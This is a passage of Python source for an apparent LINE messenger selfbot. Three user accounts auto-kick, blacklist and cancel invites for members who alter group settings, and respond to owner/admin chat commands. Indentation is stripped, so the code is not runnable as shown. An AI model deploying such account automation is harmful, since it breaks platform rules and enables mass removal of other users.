d23X_10 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
groupqr = a002.getGroup(op.param1)
if groupqr.preventedJoinByTicket == False:
d23X_11 = threading.Thread(target=lockqr, args=(op.param1,)).start()
d23X_12 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 == '1':
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_13 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
groupn = a001.getGroup(op.param1).name
if groupn not in settings["changeGroupName"][op.param1]:
progn = a001.getGroup(op.param1)
progn.name = settings["changeGroupName"][op.param1]
a001.updateGroup(progn)
d23X_14 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
else:
progn = a001.getGroup(op.param1).name
settings["changeGroupName"][op.param1] = progn
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
groupp = a001.getGroup(op.param1).pictureStatus
if groupp not in settings["changeGroupPicture"][op.param1]:
progp = a001.getGroup(op.param1)
progp.pictureStatus = settings["changeGroupPicture"][op.param1]
a001.updateGroupPicture(progp)
d23X_15 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
else:
progp = a001.getGroup(op.param1).pictureStatus
settings["changeGroupPicture"][op.param1] = progp
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
except:
try:
groupn = a002.getGroup(op.param1).name
if groupn not in settings["changeGroupName"][op.param1]:
progn = a002.getGroup(op.param1)
progn.name = settings["changeGroupName"][op.param1]
a002.updateGroup(progn)
d23X_16 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
else:
progn = a002.getGroup(op.param1).name
settings["changeGroupName"][op.param1] = progn
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
groupp = a002.getGroup(op.param1).pictureStatus
if groupp not in settings["changeGroupPicture"][op.param1]:
progp = a002.getGroup(op.param1)
progp.pictureStatus = settings["changeGroupPicture"][op.param1]
a002.updateGroupPicture(progp)
d23X_17 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
else:
progp = a002.getGroup(op.param1).pictureStatus
settings["changeGroupPicture"][op.param1] = progp
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
except:
pass
if op.type == 13 or op.type == 124:
if op.type == 13: print ("[ 13 ] NOTIFIED INVITE INTO GROUP")
else: print ("[ 124 ] NOTIFIED INVITE INTO CHAT")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck3 = threading.Thread(target=cancel, args=(op.param1, op.param3)).start()
fck4 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_18 = threading.Thread(target=blacklist, args=(op.param2,)).start()
d23X_19 = threading.Thread(target=blacklist, args=(op.param3,)).start()
try:
d23X_20 = threading.Thread(target=cancel, args=(op.param1, op.param3)).start()
d23X_21 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv1 = op.param3.replace('\x1e',',')
inv2 = inv1.split(',')
for _mid in inv2:
d23X_22 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_23 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv3 = op.param3.replace('\x1e',',')
inv4 = inv3.split(',')
for _mid in inv4:
d23X_24 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_25 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param2 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_26 = threading.Thread(target=cancel, args=(op.param1, op.param3)).start()
d23X_27 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv1 = op.param3.replace('\x1e',',')
inv2 = inv1.split(',')
for _mid in inv2:
d23X_28 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_29 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv3 = op.param3.replace('\x1e',',')
inv4 = inv3.split(',')
for _mid in inv4:
d23X_30 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_31 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_32 = threading.Thread(target=cancel, args=(op.param1, op.param3)).start()
d23X_33 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv1 = op.param3.replace('\x1e',',')
inv2 = inv1.split(',')
for _mid in inv2:
d23X_34 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_35 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
try:
inv3 = op.param3.replace('\x1e',',')
inv4 = inv3.split(',')
for _mid in inv4:
d23X_36 = threading.Thread(target=cancel, args=(op.param1, _mid)).start()
d23X_37 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if M001D23 in op.param3:
if settings["autoJoin"] == True:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
try:
d23X_38 = threading.Thread(target=join, args=(op.param1,)).start()
except:
pass
else:
try:
d23X_39 = threading.Thread(target=reject, args=(op.param1,)).start()
except:
pass
if M002D23 in op.param3:
if settings["autoJoin"] == True:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
try:
d23X_40 = threading.Thread(target=join, args=(op.param1,)).start()
except:
pass
else:
try:
d23X_41 = threading.Thread(target=reject, args=(op.param1,)).start()
except:
pass
if op.type == 17 or op.type == 130:
if op.type == 17: print ("[ 17 ] NOTIFIED ACCEPT GROUP INVITATION")
else: print ("[ 130 ] NOTIFIED ACCEPT CHAT INVITATION")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck5 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in status["blacklist"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
try:
d23X_42 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.type == 19 or op.type == 133:
if op.type == 19: print ("[ 19 ] NOTIFIED KICKOUT FROM GROUP")
else: print ("[ 133 ] NOTIFIED DELETE OTHER FROM CHAT")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck6 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_43 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_44 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_45 = threading.Thread(target=invite, args=(op.param1, op.param3)).start()
except:
pass
if M001D23 in op.param3:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_46 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_47 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_48 = threading.Thread(target=backup, args=(op.param1, op.param3)).start()
d23X_49 = threading.Thread(target=antijs, args=(op.param1, op.param2)).start()
d23X_50 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if M002D23 in op.param3:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_51 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_52 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_53 = threading.Thread(target=backup, args=(op.param1, op.param3)).start()
d23X_54 = threading.Thread(target=antijs, args=(op.param1, op.param2)).start()
d23X_55 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if M003D23 in op.param3:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_56 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_57 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_58 = threading.Thread(target=invite, args=(op.param1, op.param3)).start()
d23X_59 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.type == 32 or op.type == 126:
if op.type == 32: print ("[ 32 ] NOTIFIED CANCEL INVITATION GROUP")
else: print ("[ 126 ] NOTIFIED CANCEL CHAT INVITATION")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck7 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_60 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_61 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_62 = threading.Thread(target=invite, args=(op.param1, op.param3)).start()
except:
pass
if op.param3 == M001D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_63 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_64 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_65 = threading.Thread(target=backup, args=(op.param1, op.param3)).start()
except:
pass
if op.param3 == M002D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_66 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_67 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_68 = threading.Thread(target=backup, args=(op.param1, op.param3)).start()
except:
pass
if op.param3 == M003D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_69 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_70 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_71 = threading.Thread(target=invite, args=(op.param1, op.param3)).start()
except:
pass
if op.type == 55:
print ("[ 55 ] NOTIFIED READ MESSAGE")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck8 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.type == 25 or op.type == 26:
# if op.type == 25: print ("[ 25 ] SEND MESSAGE")
# else: print ("[ 26 ] RECEIVE MESSAGE")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck9 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.type == 22 or op.type == 24:
if op.type == 22: print ("[ 22 ] NOTIFIED INVITE INTO ROOM")
else: print ("[ 24 ] NOTIFIED LEAVE ROOM")
try:
a001.leaveRoom(op.param1)
except:
try:
a002.leaveRoom(op.param1)
except:
try:
a003.leaveRoom(op.param1)
except:
pass
if op.type == 25 or op.type == 26:
if op.type == 25: print ("[ 25 ] SEND MESSAGE")
else: print ("[ 26 ] RECEIVE MESSAGE")
global cmd
global text
global groupParam
msg = op.message
text = msg.text
reply = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0 or msg.toType == 1 or msg.toType == 2:
if msg.toType == 0:
if sender != a001.profile.mid:
to = sender
else:
to = receiver
if msg.toType == 1:
to = receiver
if msg.toType == 2:
to = receiver
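# msg.toType: 0 = private chat (reply goes back to the sender), 1 = room, 2 = group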
if msg.contentType == 1:
if sender in creator or sender in owner:
if M001D23 in settings["updatePict"]:
path = a001.downloadObjectMsg(msg.id)
del settings["updatePict"][M001D23]
a001.updateProfilePicture(path)
a001.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nSuccess Change Profile Picture")
if M002D23 in settings["updatePict"]:
path = a002.downloadObjectMsg(msg.id)
del settings["updatePict"][M002D23]
a002.updateProfilePicture(path)
a002.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nSuccess Change Profile Picture")
if M003D23 in settings["updatePict"]:
path = a003.downloadObjectMsg(msg.id)
del settings["updatePict"][M003D23]
a003.updateProfilePicture(path)
a003.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nSuccess Change Profile Picture")
if msg.contentType == 13:
if settings["addowner"] == True:
if sender in creator:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["owner"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Owner Access".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addowner"] = False
else:
if msg.contentMetadata["mid"] not in status["blacklist"]:
status["owner"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Recruit To Owner".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addowner"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser In Blacklist")
settings["addowner"] = False
if settings["delowner"] == True:
if sender in creator:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["owner"]:
status["owner"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Expel From Owner".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["delowner"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Owner Access")
settings["delowner"] = False
if settings["addadmin"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["admin"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Admin Access".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addadmin"] = False
else:
if msg.contentMetadata["mid"] not in status["blacklist"]:
status["admin"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Recruit To Admin".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addadmin"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser In Blacklist")
settings["addadmin"] = False
if settings["deladmin"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["admin"]:
status["admin"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Expel From Admin".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["deladmin"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Admin Access")
settings["deladmin"] = False
if settings["addstaff"] == True:
if sender in creator or sender in owner or sender in admin:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["staff"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Staff Access".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addstaff"] = False
else:
if msg.contentMetadata["mid"] not in status["blacklist"]:
status["staff"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Recruit To Staff".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addstaff"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser In Blacklist")
settings["addstaff"] = False
if settings["delstaff"] == True:
if sender in creator or sender in owner or sender in admin:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["staff"]:
status["staff"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Expel From Staff".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["delstaff"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Staff Access")
settings["delstaff"] = False
if settings["addbots"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["mybots"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Squad List".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addbots"] = False
else:
if msg.contentMetadata["mid"] not in status["blacklist"]:
status["mybots"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Add To Squad".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addbots"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser In Blacklist")
settings["addbots"] = False
if settings["delbots"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["mybots"]:
status["mybots"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Delete From Squad".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["delbots"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Squad List")
settings["delbots"] = False
if settings["addban"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["blacklist"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Blacklist".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addban"] = False
else:
status["blacklist"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Add To Blacklist".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addban"] = False
if settings["delban"] == True:
if sender in creator or sender in owner or sender in admin:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["blacklist"]:
status["blacklist"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Delete From Blacklist".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["delban"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Blacklist")
settings["delban"] = False
if msg.contentType == 0:
if text is None:
return
else:
hellterhead = command(text)
hlth = " ".join(hellterhead.split())
for hlth in hellterhead.split(' & '):
if hlth == "help":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(helpCmd))
elif hlth == "protection":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(proCmd))
elif hlth == "group":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(groupCmd))
elif hlth == "access":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(accessCmd))
elif hlth == "option":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(optCmd))
elif hlth == "settings":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(setCmd))
elif hlth.startswith("allowliff"):
if sender in creator or sender in owner or sender in admin or sender in staff:
try:
allowLiff()
a001.sendReplyMessage(reply,receiver,"Flex Mode Enable")
except:
a001.sendMessage(receiver,"line://app/1602687308-GXq4Vvk9/?type=text&text=セルボットDRE!")
elif hlth == "mention" or hlth == "tagall":
group = a001.getGroup(receiver)
memb = [contact.mid for contact in group.members]
a001.datamention(receiver,"{}".format(group.name),memb)
elif hlth == "reboot":
if sender in creator or sender in owner:
a001.sendMessage(receiver,"[ Rebooting... ]")
settings["restartPoint"] = receiver
restartProgram()
elif hlth == "shutdown":
if sender in creator or sender in owner:
a001.sendMessage(receiver,"[ Turn Off Program ]")
sys.exit('\n》》》》PROGRAM TERMINATED《《《《\n')
elif hlth == "clearchat":
if sender in creator or sender in owner or sender in admin:
for x in Botslist:
x.removeAllMessages(op.param2)
for z in Botslist:
z.sendReplyMessage(reply,receiver,"[ All Chat Cleared ]")
elif hlth == "creator":
sendFooter(receiver,str(dreX53))
elif hlth == "about":
sendFooter(receiver,str(aboutCmd))
elif hlth == "me":
contact = a001.getContact(sender)
a001.sendContact(receiver, contact.mid)
elif hlth == "mid":
contact = a001.getContact(sender)
a001.sendReplyMessage(reply,receiver, "{}".format(contact.mid))
elif hlth.startswith("mid "):
if 'MENTION' in msg.contentMetadata:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
mcont = ""
for ls in lists:
mcont += "{}".format(str(ls))
a001.sendReplyMessage(reply,receiver,str(mcont))
elif hlth.startswith("contact "):
if 'MENTION' in msg.contentMetadata:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = a001.getContact(ls)
cont = contact.mid
a001.sendContact(receiver, cont)
elif hlth == "ping":
a001.sendMessage(receiver,"PING!!!")
a002.sendMessage(receiver,"PING!!!")
a003.sendMessage(receiver,"PING!!!")
elif hlth == "respon":
if sender in creator or sender in owner or sender in admin or sender in staff:
a001.sendReplyMessage(reply,receiver,"[ {} ]".format(resp1))
a002.sendReplyMessage(reply,receiver,"[ {} ]".format(resp2))
a003.sendReplyMessage(reply,receiver,"[ {} ]".format(resp3))
elif hlth == "speed":
if sender in creator or sender in owner or sender in admin or sender in staff:
a001.sendReplyMessage(reply,receiver,logspeed())
a002.sendReplyMessage(reply,receiver,logspeed())
a003.sendReplyMessage(reply,receiver,logspeed())
elif hlth == "debug":
if sender in creator or sender in owner or sender in admin or sender in staff:
a001.sendReplyMessage(reply,receiver,debug())
a002.sendReplyMessage(reply,receiver,debug())
a003.sendReplyMessage(reply,receiver,debug())
elif hlth == "ginfo":
if sender in creator or sender in owner or sender in admin or sender in staff:
group = a001.getGroup(receiver)
try:
gCreator = group.creator.displayName
except:
gCreator = "Not Found"
if group.invitee is None:
gPending = "0"
else:
gPending = str(len(group.invitee))
if group.preventedJoinByTicket == True:
gQr = "Clossed"
gTicket = "Nothing"
else:
gQr = "Opened"
gTicket = "https://line.me/R/ti/g/{}".format(str(a001.reissueGroupTicket(group.id)))
hlthX = "[ Group Info ]"
hlthX += "\n- Group Name: {}".format(str(group.name))
hlthX += "\n- Group ID: {}".format(group.id)
hlthX += "\n- Creator: {}".format(str(gCreator))
hlthX += "\n- Member: {}".format(str(len(group.members)))
hlthX += "\n- Pending: {}".format(gPending)
hlthX += "\n- Group URL: {}".format(gQr)
hlthX += "\n- Group Ticket: {}".format(gTicket)
a001.sendReplyMessage(reply,receiver,hlthX)
elif hlth == "openqr":
if sender in creator or sender in owner or sender in admin:
group = a001.getGroup(receiver)
group.preventedJoinByTicket = False
a001.updateGroup(group)
gurl = a001.reissueGroupTicket(receiver)
a001.sendReplyMessage(reply,receiver,"QR Group Opened")
a001.sendReplyMessage(reply,receiver,"line://ti/g/" + gurl)
elif hlth == "closeqr":
if sender in creator or sender in owner or sender in admin:
group = a001.getGroup(receiver)
group.preventedJoinByTicket = True
a001.updateGroup(group)
a001.sendReplyMessage(reply,receiver,"QR Group Closed")
elif hlth == "leave":
if sender in creator or sender in owner or sender in admin:
for bot in Botslist:
bot.leaveGroup(receiver)
elif hlth.startswith("leave "):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("leave ","")
if spl == "1":
a001.leaveGroup(receiver)
if spl == "2":
a002.leaveGroup(receiver)
if spl == "3":
a003.leaveGroup(receiver)
elif hlth == "join":
if sender in creator or sender in owner or sender in admin:
G = a001.getGroup(receiver)
G.preventedJoinByTicket = False
a001.updateGroup(G)
links = a001.reissueGroupTicket(receiver)
a002.acceptGroupInvitationByTicket(receiver,links)
a003.acceptGroupInvitationByTicket(receiver,links)
G = a001.getGroup(receiver)
G.preventedJoinByTicket = True
a001.updateGroup(G)
elif hlth == "blacklist" or hlth == "banlist":
if sender in creator or sender in owner or sender in admin or sender in staff:
if len(status["blacklist"]) > 0:
h = [a for a in status["blacklist"]]
k = len(h)//20
for aa in range(k+1):
if aa == 0:dd = '┏━ Blacklist User';no=aa
else:dd = '';no=aa*20
msgas = dd
for a in h[aa*20:(aa+1)*20]:
    no += 1
    msgas += '\n┣ {}. @!'.format(no)
msgas += '\n┗━━━━'
sendMention(to, msgas, h[aa*20:(aa+1)*20])
else:
a001.sendReplyMessage(reply,receiver,"[ Doesn't Have Any Blacklist User ]")
elif hlth == "clearban":
if sender in creator or sender in owner or sender in admin:
if len(status["blacklist"]) > 0:
a001.sendReplyMessage(reply,receiver, "[ {} User Cleared ]".format(len(status["blacklist"])))
status["blacklist"].clear()
else:
a001.sendReplyMessage(reply,receiver,"[ Doesn't Have Any Blacklist User ]")
elif hlth == "squad list":
if sender in creator or sender in owner or sender in admin or sender in staff:
ma = ""
a = 0
for ls in mybots:
a = a + 1
ma += '┣ ' + str(a) + ". " +a001.getContact(ls).displayName + "\n"
a001.sendReplyMessage(reply,receiver, "┏━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.\n┣━━━━ List Bots\n"+ma+"┗━ Total [ %s ] Bots" %(str(len(mybots))))
elif hlth == "view bots":
if sender in creator or sender in owner or sender in admin or sender in staff:
ma = ""
a = 0
for ls in Bots:
a = a + 1
ma += '┣ ' + str(a) + ". " +a001.getContact(ls).displayName + "\n"
a001.sendReplyMessage(reply,receiver, "┏━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.\n┣━━━━ List Bots\n"+ma+"┗━ Total [ %s ] Bots" %(str(len(Bots))))
elif hlth == "view access":
if sender in creator or sender in owner or sender in admin or sender in staff:
ma = ""
mb = ""
mc = ""
md = ""
a = 0
b = 0
c = 0
d = 0
for ls in creator:
a = a + 1
ma += '┣ ' + str(a) + ". " +a001.getContact(ls).displayName + "\n"
for ls in owner:
b = b + 1
mb += '┣ ' + str(b) + ". " +a001.getContact(ls).displayName + "\n"
for ls in admin:
c = c + 1
mc += '┣ ' + str(c) + ". " +a001.getContact(ls).displayName + "\n"
for ls in staff:
d = d + 1
md += '┣ ' + str(d) + ". " +a001.getContact(ls).displayName + "\n"
a001.sendReplyMessage(msg.id, to, "┏━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.\n┣━━━━ List Access\n┣━━━━ Creator\n"+ma+"┣━━━━ Owner\n"+mb+"┣━━━━ Admin\n"+mc+"┣━━━━ Staff\n"+md+"┗━ Total [ %s ] Access" %(str(len(creator)+len(owner)+len(admin)+len(staff))))
elif hlth.startswith("add owner"):
if sender in creator:
key = json.loads(msg.contentMetadata["MENTION"])
targets = [x["M"] for x in key["MENTIONEES"]]
for xbot in Botslist:
for xtarg in targets:
try:
xbot.findAndAddContactsByMid(xtarg)
except:
pass
for target in targets:
try:
status["owner"].append(target)
sendMention(to,"[ Add Owner ]\nUser @! Added To Owner Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Owner ]\nCreator Permission")
elif hlth.startswith("del owner"):
if sender in creator:
key = json.loads(msg.contentMetadata["MENTION"])
targets = [x["M"] for x in key["MENTIONEES"]]
for target in targets:
try:
status["owner"].remove(target)
sendMention(to,"[ Delete Owner ]\nUser @! Deleted From Owner Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Owner ]\nCreator Permission")
elif hlth.startswith("add admin"):
if sender in creator or sender in owner:
key = json.loads(msg.contentMetadata["MENTION"])
targets = [x["M"] for x in key["MENTIONEES"]]
for xbot in Botslist:
for xtarg in targets:
try:
xbot.findAndAddContactsByMid(xtarg)
except:
pass
for target in targets:
try:
status["admin"].append(target)
sendMention(to,"[ Add Admin ]\nUser @! Added To Admin Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Admin ]\nOwner Permission")
elif hlth.startswith("del admin"):
if sender in creator or sender in owner:
key = json.loads(msg.contentMetadata["MENTION"])
targets = [x["M"] for x in key["MENTIONEES"]]
for target in targets:
try:
status["admin"].remove(target)
sendMention(to,"[ Delete Admin ]\nUser @! Deleted From Admin Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Admin ]\nOwner Permission")
elif hlth.startswith("add staff"):
if sender in creator or sender in owner or sender in admin:
key = json.loads(msg.contentMetadata["MENTION"])
targets = [x["M"] for x in key["MENTIONEES"]]
for xbot in Botslist:
for xtarg in targets:
try:
xbot.findAndAddContactsByMid(xtarg)
except:
pass
for target in targets:
try:
status["staff"].append(target)
sendMention(to,"[ Add Staff ]\nUser @! Added To Staff Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Staff ]\nOwner/Admin Permission")
elif hlth.startswith("del staff"):
if sender in creator or sender in owner or sender in admin:
key = json.loads(msg.contentMetadata["MENTION"])
targets = [x["M"] for x in key["MENTIONEES"]]
for target in targets:
try:
status["staff"].remove(target)
sendMention(to,"[ Delete Staff ]\nUser @! Deleted From Staff Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Staff ]\nOwner/Admin Permission")
elif hlth.startswith("add squad"):
if sender in creator or sender in owner:
key = json.loads(msg.contentMetadata["MENTION"])
targets = [x["M"] for x in key["MENTIONEES"]]
for xbot in Botslist:
for xtarg in targets:
try:
xbot.findAndAddContactsByMid(xtarg)
except:
pass
for target in targets:
try:
status["mybots"].append(target)
sendMention(to,"[ Add Squad ]\nUser @! Added To Squad List",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Squad ]\nOwner Permission")
elif hlth.startswith("del squad"):
if sender in creator or sender in owner:
key = json.loads(msg.contentMetadata["MENTION"])
targets = [x["M"] for x in key["MENTIONEES"]]
for target in targets:
try:
status["mybots"].remove(target)
